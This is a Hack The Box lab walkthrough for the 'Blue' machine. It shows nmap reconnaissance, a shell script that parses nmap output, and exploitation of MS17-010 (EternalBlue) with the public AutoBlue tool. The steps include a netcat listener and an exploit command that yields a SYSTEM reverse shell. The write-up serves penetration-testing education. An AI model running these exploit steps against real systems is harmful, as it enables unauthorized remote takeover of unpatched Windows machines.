Blue – Hack The Box Walkthrough Without Metasploit

This is a walkthrough of the Blue box from Hack The Box, done without using Metasploit.

1. Reconnaissance

Run an initial nmap scan against all TCP ports to find what is listening:

nmap -sC -sV -O -p- -oA tcp_scan 10.10.10.40

  • -sC = run default nmap scripts
  • -sV = detect service version
  • -O = detect the OS
  • -p- = scan all ports
  • -oA tcp_scan = write the output in all three formats (normal .nmap, grepable .gnmap and .xml) to files named tcp_scan in the current working directory

The results show port 135 (msrpc), port 139 (Windows netbios-ssn), port 445 (microsoft-ds, i.e. SMB) and the high msrpc ports 49152 through 49157 open. SMB on 445 is the service worth looking at first.

Run one more scan, this time for UDP ports. UDP scans take a long time, so this time I decided to do just the top 1000 ports. This still took almost an hour to complete and did not return any other ports that were open/exploitable (they were all filtered). Keep in mind that nmap cannot tell an open UDP port from a filtered one when it gets no response at all, so a quiet UDP scan is not proof that nothing is listening.

nmap -sU --top-ports 1000 -oA udp_scan 10.10.10.40

  • -sU = scan udp ports
  • --top-ports 1000 = scan only the 1000 most common ports


2. Enumeration

Run the nmap vulnerability scripts against the services we found running. Note that without -p this scan only covers the top 1000 TCP ports, which is fine here because 445 is among them:

nmap --script vuln -oA nmapvulns 10.10.10.40

The results show that this box is vulnerable to CVE-2017-0143, one of the SMBv1 remote code execution bugs patched by MS17-010 and exploited by EternalBlue (nmap reports it via the smb-vuln-ms17-010 script with State: VULNERABLE).
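The two scans above are saved with -oA, so their results can be parsed rather than read by eye. The script below is an added example, not part of the original walkthrough or of nmap: it pulls the open TCP ports out of a .gnmap file (useful for feeding a targeted -p list into the vuln scan instead of rescanning everything) and reads the smb-vuln-ms17-010 state out of the .nmap file. The sample scan output it creates is constructed to match the file formats, not real results from 10.10.10.40; the file names tcp_scan.gnmap and nmapvulns.nmap follow the -oA names used on this page.

```shell
#!/bin/sh
# Added example: parse nmap -oA output from the recon and enumeration steps.
# Not part of the original walkthrough or of the nmap project.

# open_ports FILE.gnmap : print the open TCP port numbers, one per line, sorted.
# Grepable lines look like: Host: IP ()<TAB>Ports: 445/open/tcp//microsoft-ds//.../, ...
open_ports() {
  awk -F'\t' '
    /^Host:/ {
      for (i = 2; i <= NF; i++) if (index($i, "Ports: ") == 1) {
        n = split(substr($i, 8), entry, ", ")
        for (j = 1; j <= n; j++) {
          split(entry[j], f, "/")   # port/state/proto/owner/service/rpc/version
          if (f[2] == "open" && f[3] == "tcp") print f[1]
        }
      }
    }' "$1" | sort -n
}

# ports_arg FILE.gnmap : the same ports as a comma list, ready for nmap -p.
# e.g. nmap --script vuln -p "$(ports_arg tcp_scan.gnmap)" -oA nmapvulns 10.10.10.40
ports_arg() {
  open_ports "$1" | tr '\n' ',' | sed 's/,$//'
}

# ms17_010_state FILE.nmap : print the State reported by smb-vuln-ms17-010,
# or UNKNOWN when the script block is absent. Absence is not "safe": by default
# the vuln scripts only print a block when the target IS vulnerable, so UNKNOWN
# also covers a host that was never checked or did not answer.
ms17_010_state() {
  awk '
    /^[|] *smb-vuln-ms17-010:/ { in_block = 1; next }
    in_block && /^[|]_?[ ]*State: / { s = $0; sub(/.*State: */, "", s); print s; found = 1; exit }
    in_block && /^[|]_?[ ]*smb-/ { in_block = 0 }   # another script block started
    in_block && !/^[|]/ { in_block = 0 }            # left the script output
    END { if (!found) print "UNKNOWN" }
  ' "$1"
}

# make_samples DIR : write CONSTRUCTED sample files shaped like -oA output.
make_samples() {
  printf '# Nmap 7.80 scan initiated as: nmap -sC -sV -O -p- -oA tcp_scan 10.10.10.40\n' > "$1/tcp_scan.gnmap"
  printf 'Host: 10.10.10.40 ()\tStatus: Up\n' >> "$1/tcp_scan.gnmap"
  printf 'Host: 10.10.10.40 ()\tPorts: %s\tIgnored State: filtered (65530)\n' \
    '135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 445/open/tcp//microsoft-ds//Windows microsoft-ds/, 49152/open/tcp//msrpc//Microsoft Windows RPC/, 80/closed/tcp//http///' \
    >> "$1/tcp_scan.gnmap"
  cat > "$1/nmapvulns.nmap" <<'EOF'
# Nmap 7.80 scan initiated as: nmap --script vuln -oA nmapvulns 10.10.10.40
Nmap scan report for 10.10.10.40
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_smb-vuln-ms10-054: false
EOF
}

demo() {
  dir=$(mktemp -d)
  make_samples "$dir"
  printf 'open tcp ports : %s\n' "$(ports_arg "$dir/tcp_scan.gnmap")"
  printf 'ms17-010 state : %s\n' "$(ms17_010_state "$dir/nmapvulns.nmap")"
  rm -rf "$dir"
}
demo
```

Run it as-is to see the parse of the constructed samples, or point `ports_arg` and `ms17_010_state` at your own tcp_scan.gnmap and nmapvulns.nmap. The closed port 80 in the sample is deliberately dropped by the state filter, and a file with no smb-vuln-ms17-010 block yields UNKNOWN rather than a false "not vulnerable".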


3. Exploitation

Searching Google for an MS17-010 exploit turns up a promising one called AutoBlue (https://github.com/3ndG4me/AutoBlue-MS17-010). To download it:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

There are some great, clear instructions on the GitHub page that explain what to do. First you need to run the shell prep script from the shellcode directory. As you follow the prompts, make sure to NOT select a meterpreter shell or a staged payload: both of those need a Metasploit handler on the receiving end, and a plain netcat listener can only catch a stageless, regular shell:

This generates a reverse shell payload, so we need a netcat listener on our side to receive the connection. Use whatever port you entered while setting up the shell prep above (it must match the port baked into the shellcode). I used port 7777:

nc -nlvp 7777

The GitHub instructions give the syntax for running the exploit. The exploit7 script is the one for Windows 7 / Server 2008 R2 targets, which is what this box is running, so set that up and hit enter to run it:

python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin

After you run this, you should see a reverse shell arrive on your listener (I had to run the script a few times to get it to work). This is normal for EternalBlue: the kernel pool grooming is not fully reliable, and a failed attempt can also crash the target, so if the box stops responding to SMB, reset it before trying again:

Run a whoami and you should see that you are running as nt authority\system (the Windows equivalent of root), so there is no privilege escalation step. Grab your flags! I like to start by running cd .. all the way back to C:\ and then running dir to see what is in that directory. From there I navigate around until I find the user and root flags, which on Hack The Box sit on the user desktops under C:\Users:

